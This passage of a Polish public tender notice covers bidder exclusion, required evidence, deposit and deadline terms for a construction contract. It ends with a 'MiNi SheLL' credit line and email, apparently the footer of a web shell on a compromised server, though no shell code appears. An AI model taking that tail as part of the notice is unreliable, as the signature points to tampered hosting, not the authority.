zawodowe lub ich sytuacja finansowa lub ekonomiczna, pozwalają na wykazanie przez Wykonawcę spełniania warunków udziału w postępowaniu, o których mowa w pkt. 1.2 , a także bada, czy nie zachodzą wobec tego podmiotu przesłanki wykluczenia, które zostały przewidziane względem Wykonawcy w pkt. 1.1<br/>1.3.5. Podmiot, który zobowiązał się do udostępnienia zasobów, odpowiada solidarnie z Wykonawcą, który polega na jego<br/>sytuacji finansowej lub ekonomicznej, za szkodę poniesioną przez zamawiającego powstałą w skutek nieudostępnienia tych<br/>zasobów, chyba że nieudostępnienie tych zasobów podmiot ten nie ponosi winy.<br/>1.3.6. Jeżeli zdolności techniczne lub zawodowe, sytuacja finansowa lub ekonomiczna podmiotu udostępniającego zasoby<br/>nie potwierdzają spełniania przez wykonawcę warunków udziału w postępowaniu lub zachodzą wobec tego podmiotu<br/>podstawy wykluczenia zamawiający żąda , aby wykonawca w terminie określonym przez zamawiającego zastąpił ten<br/>podmiot innym podmiotem lub podmiotami albo wykazał, że samodzielnie spełnia warunki udziału w postępowaniu.<br/>1.3.7. Wykonawca nie może, po upływie terminu składania ofert, powoływać się na zdolności lub sytuację podmiotów<br/>udostępniających zasoby, jeżeli na etapie składania ofert nie polegał on w danym zakresie na zdolnościach lub sytuacji<br/>podmiotów udostępniających zasoby.<br/>1.4. Ocena spełniania warunków udziału w postępowaniu przez Wykonawcę zostanie dokonana przez Zamawiającego na<br/>podstawie załączonych przez Wykonawcę do oferty dokumentów i/lub oświadczeń. Ocena dokonana zostanie na zasadzie<br/>spełnia/ nie spełnia. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">W zakresie braku podstaw wykluczenia wykonawcy z udziału w postępowaniu:<br/>1. Oświadczenie wykonawcy w zakresie art.108 ust. 1 pkt 5 Pzp<br/>o braku przynależności do tej samej grupy kapitałowej.<br/>wg. wzoru stanowiącego załącznik nr 3 do SWZ<br/>2. Zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że Wykonawca nie zalega z opłaceniem podatków i opłat, w zakresie art. 109 ust 1 pkt. 1 Pzp, wystawione nie wcześniej niż 3 miesiące przed jego złożeniem, a w przypadku zalegania z opłaceniem podatków lub opłat wraz z zaświadczeniem zamawiający żąda złożenia dokumentów potwierdzających, że przed upływem terminu składania ofert Wykonawca dokonał płatności należnych podatków lub opłat wraz z odsetkami lub grzywnami lub zawarł wiążące porozumienie w sprawie spłat tych należności,<br/>3. Zaświadczenia albo innego dokumentu właściwej terenowej jednostki organizacyjnej Zakładu Ubezpieczeń Społecznych lub<br/>właściwego oddziału regionalnego lub właściwej placówki terenowej Kasy Rolniczego Ubezpieczenia Społecznego<br/>potwierdzającego, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia społeczne i zdrowotne w zakresie art. 109 ust.<br/>1 pkt. 1 ustawy, wystawionego nie wcześniej niż 3 miesiące przed jego złożeniem, a w przypadku zalegania z opłaceniem składek na<br/>ubezpieczenie społeczne lub zdrowotne wraz z zaświadczeniem zamawiający żąda złożenia dokumentów potwierdzających, że<br/>przed upływem terminu składania ofert Wykonawca dokonał płatności należnych składek na ubezpieczenie społeczne lub zdrowotne wraz z odsetkami lub grzywnami lub zawarł wiążące porozumienie w sprawie spłat tych należności,<br/>4. Odpisu lub informacji z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji i Informacji o działalności gospodarczej, w<br/>zakresie art. 109 ust. 1 pkt 4 ustawy, sporządzonych nie wcześniej niż 3 miesiące przed jej złożeniem, jeżeli odrębne przepisy<br/>wymagają wpisu do rejestru lub ewidencji<br/>5. Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamiast dokumentów, o<br/>których mowa: w pkt. 2-4 , składa dokument lub dokumenty wystawione w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, że:<br/>5.1. nie naruszył obowiązków dotyczących płatności podatków, opłat lub składek na ubezpieczenie społeczne lub zdrowotne<br/>5.2. nie otwarto jego likwidacji, nie ogłoszono upadłości, jego aktywami nie zarządza likwidator lub sąd, nie zawarł układu z<br/>wierzycielami, jego działalność gospodarcza nie jest zawieszona ani nie znajduje się on w innej tego rodzaju sytuacji wynikającej z<br/>podobnej procedury przewidzianej w przepisach miejsca wszczęcia tej procedury.<br/>Dokumenty te powinny być wystawione nie wcześniej niż 3 miesiące przed dniem ich złożenia<br/>5.3. Jeżeli w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów, o których mowa<br/>powyżej, zastępuje się je odpowiednio w całości lub w części dokumentem zawierającym odpowiednio oświadczenie wykonawcy, ze wskazaniem osoby lub osób uprawnionych do jego reprezentacji, lub oświadczenie osoby, której dokument miał dotyczyć, złożone pod przysięgą, lub, jeżeli w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania nie ma przepisów o oświadczeniu pod przysięgą, złożone przed organem sądowym lub administracyjnym, notariuszem, organem samorządu zawodowego lub gospodarczego, właściwym ze względu na siedzibę lub miejsce zamieszkania wykonawcy. Oświadczenie o którym mowa w zdaniu poprzednim powinno być wystawione nie wcześniej niż 3 miesiące przed ich złożeniem.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Dotyczące zdolności technicznej lub zawodowej:<br/>- Wykaz osób, skierowanych przez wykonawcę do realizacji zamówienia publicznego, w szczególności odpowiedzialnych za<br/>świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji<br/>zawodowych, uprawnień, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami. Wg wzoru stanowiącego załącznik nr 4 do SWZ<br/>-Wykaz zawierający minimum 2 (słownie: dwa) roboty budowlane wielobranżowe (zawierające branże elektryczną, budowlaną, sanitarną w tym wentylacja mechaniczna, drogową) w zakresie budowy budynku mieszkalnego wielorodzinnego, budynku<br/>mieszkalno- usługowego lub budynku użyteczności publicznej wartości co najmniej 6 000 000,00 zł brutto każda, wykonanych nie wcześniej niż w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, z podaniem ich rodzaju, wartości, daty, miejsca wykonania i podmiotów, na rzecz których roboty te zostały wykonane oraz załączeniem dowodów (dokumentów) określających, czy wskazane w wykazie ww. roboty zostały wykonane w sposób należyty oraz wskazujące, czy zostały wykonane należycie (tzw. poświadczenie, protokoły odbioru końcowego robót, referencje, listy referencyjne, itp.). Wg wzoru stanowiącego załącznik nr 5 do SWZ<br/>Dotyczące sytuacji ekonomicznej lub finansowej:<br/>-Informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającej wysokość posiadanych środków finansowych (minimum 4000000,00 zł) lub zdolność kredytową wykonawcy, w okresie nie wcześniejszym niż 1 miesiąc przed upływem terminu składania ofert.<br/>-Opłaconą polisę (wraz z potwierdzeniem zapłaty), a w przypadku jej braku inny dokument potwierdzający, że Wykonawca jest<br/>ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na kwotę<br/>minimum 6000000,00 zł</span> </h3> <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> Wraz z Formularzem Oferty (załącznik nr 1 do SWZ- formularz interaktywny) Wykonawca składa:<br/>1. Pełnomocnictwo upoważniające do złożenia oferty, o ile ofertę składa pełnomocnik;<br/>2. Pełnomocnictwo dla pełnomocnika do reprezentowania w postępowaniu Wykonawców wspólnie ubiegających się o<br/>udzielenie zamówienia- dotyczy ofert składanych przez Wykonawców wspólnie ubiegających się o udzielenie zamówienia<br/>3. Oświadczenie Wykonawcy o nie podleganiu wykluczeniu z postępowania i spełnianiu warunków udziału w postępowaniu wzór oświadczenia z art. 125 ust 1 Pzp (załącznik nr 2 lub 2A do SWZ)<br/>4. Zobowiązanie Podmiotu (jeżeli dotyczy) (załącznik nr 6 do SWZ)<br/>5. Oświadczenie zgodnie z art. 117 ust 4 Pzp (dla wykonawców wspólnie ubiegających się o udzielenie zamówienia) Z oświadczenia powinno wynikać, który wykonawca będzie realizował konkretny zakres prac. (załącznik nr 8 do SWZ)<br/>6. Informację o podwykonawcach (Załącznik nr 7 do SWZ) <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> 1. Zamawiający wymaga wniesienia wadium w kwocie 250.000,00 zł (dwieście pięćdziesiąt tysięcy złotych).<br/>2. Wadium wnosi się przed upływem terminu składania ofert i utrzymuje nieprzerwanie do dnia upływu terminu związania<br/>ofertą, z wyjątkiem przypadków, o których mowa w art. 98 ust. 1 pkt 2 i 3 oraz ust. 2 Ustawy.<br/>3. Przedłużenie terminu związania ofertą jest dopuszczalne tylko z jednoczesnym przedłużeniem okresu ważności wadium<br/>albo, jeżeli nie jest to możliwe, z wniesieniem nowego wadium na przedłużony okres związania ofertą.<br/>4.Wadium może być wnoszone według wyboru wykonawcy w jednej lub kilku następujących formach:<br/>a) pieniądzu;<br/>b) gwarancjach bankowych;<br/>c)gwarancjach ubezpieczeniowych;<br/>d)poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o<br/>utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. z 2019 r. poz. 310, 836 i 1572).<br/>5.W przypadku wnoszenia przez Wykonawcę wadium w formie gwarancji, gwarancja ta musi spełniać następujące wymagania:<br/>a)gwarancja musi wskazywać nazwę i adres Zamawiającego, nazwę postępowania, termin ważności wadium;<br/>b)gwarancja musi być co najmniej gwarancją bezwarunkową, nieodwołalną i płatną na pierwsze żądanie Zamawiającego,<br/>dokonane w formie pisemnej lub oświadczenia woli złożonego w postaci elektronicznej opatrzonego kwalifikowanym<br/>podpisem elektronicznym (przy czym forma pisemna jest obligatoryjna i nie może zostać wykluczona w treści gwarancji);<br/>c)do gwarancji musi mieć zastosowanie prawo polskie;<br/>6.W przypadku oferty wspólnej, Zamawiający dopuszcza podział kwoty wadium pomiędzy wykonawców wspólnie ubiegających się o udzielenie zamówienia i wniesienie go w częściach, o ile suma tych części będzie równa kwocie wadium.<br/>7. Wadium wnoszone w pieniądzu wpłaca się przelewem na rachunek bankowy Zamawiającego ING Bank Śląski 11 1050<br/>1618 1000 0022 4082 1914 podając w tytule przelewu „Wadium w przetargu OTBS-ZP-2/2023&#34;<br/>8. Jeżeli wadium jest wnoszone w formie gwarancji lub poręczenia, o których mowa w ust. 4 pkt b) - d) wykonawca<br/>przekazuje zamawiającemu oryginał gwarancji lub poręczenia, w postaci elektronicznej.<br/>9. Brak wniesienia wadium w wymaganym terminie, w wymaganej wysokości, dopuszczonej formie lub wniesienie w sposób<br/>nieprawidłowy skutkuje odrzuceniem oferty zgodnie z art. 226 ust. 1 pkt 14) Ustawy. <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1. W przypadku wspólnego ubiegania się o zamówienie przez Wykonawców, oświadczenie, o którym mowa w art. 125 ust. 1 Pzp, składa każdy z Wykonawców. Oświadczenia te potwierdzają brak podstaw wykluczenia oraz spełnianie warunków udziału w postępowaniu w zakresie, w jakim każdy z Wykonawców wykazuje spełnianie warunków udziału w postępowaniu.<br/>Ponadto, wykonawcy wspólnie ubiegający się o zamówienie składają oświadczenie, o którym mowa w art. 117 ust. 4 Pzp zgodnie z załącznikiem nr 8 do SWZ.<br/>2.Oświadczenie zgodne z art. 117 ust. 4 PZP (dla wykonawców wspólnie ubiegających się o udzielenie zamówienia). Z oświadczenia powinno wynikać, który wykonawca będzie realizował konkretny zakres prac. (Załącznik nr 8 do SWZ).<br/>3. Przed podpisaniem umowy Wykonawcy wspólnie ubiegający się o udzielenie zamówienia (w przypadku wyboru ich oferty<br/>jako najkorzystniejszej) przedstawią Zamawiającemu umowę regulującą współpracę tych Wykonawców. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Rodzaj i zakres zmian umowy oraz warunków ich wprowadzenia zostały określone w projekcie umowy stanowiącym<br/>załącznik nr 9 do SWZ. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">w zakresie zatrudnienia na podstawie stosunku pracy, w okolicznościach, o których mowa w art. 95 ustawy</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2023-10-30 09:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Wykonawca składa ofertę za pomocą platformy ezamówienia (https://ezamowienia.gov.pl)</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2023-10-30 10:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal"> 30 dni </span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> 1. Zamawiający nie dopuszcza składania ofert wariantowych.<br/>2. Zamawiający nie dopuszcza składania ofert częściowych.<br/>3. Zamawiający nie przewiduje udzielania zamówień o których mowa w art. 214 ust. 1 pkt. 7) PZP.<br/>4. Zamawiający dopuszcza zmianę umowy zgodnie z załącznikiem 9 do SWZ.<br/>5. W przypadku gdy wartości podane przez Wykonawców na oświadczeniach i dokumentach o których mowa w 11.2.1.2.<br/>SWZ, podane będą w walucie innej niż PLN, Zamawiający przeliczy te wartości na PLN przyjmując średni kurs NBP danej<br/>waluty na dzień wszczęcia postępowania. Za datę wszczęcia postępowania Zamawiający uznaje datę umieszczenia<br/>ogłoszenia o zamówieniu w miejscu publicznie dostępnym w swojej siedzibie oraz na stronie internetowej. Jeżeli w tym dniu<br/>nie będzie opublikowany średni kurs NBP, Zamawiający przyjmie kurs średni z ostatniej tabeli przed wszczęciem postępowania.<br/>6. Wszelkie nieuregulowane w niniejszym SWZ czynności, uprawnienia, obowiązki Wykonawców i Zamawiającego, których<br/>ustawa nie nakazała zawierać Zamawiającemu w SWZ, a które mogą przyczynić się do właściwego przebiegu postępowania, reguluje ustawa PZP.<br/>7. Zamawiający przewiduje dokonanie zmian umowy w toku jej realizacji w przypadku zaistnienia okoliczności, o których<br/>mowa w art. 455 ustawy PZP.

Creat By MiNi SheLL
Email: jattceo@gmail.com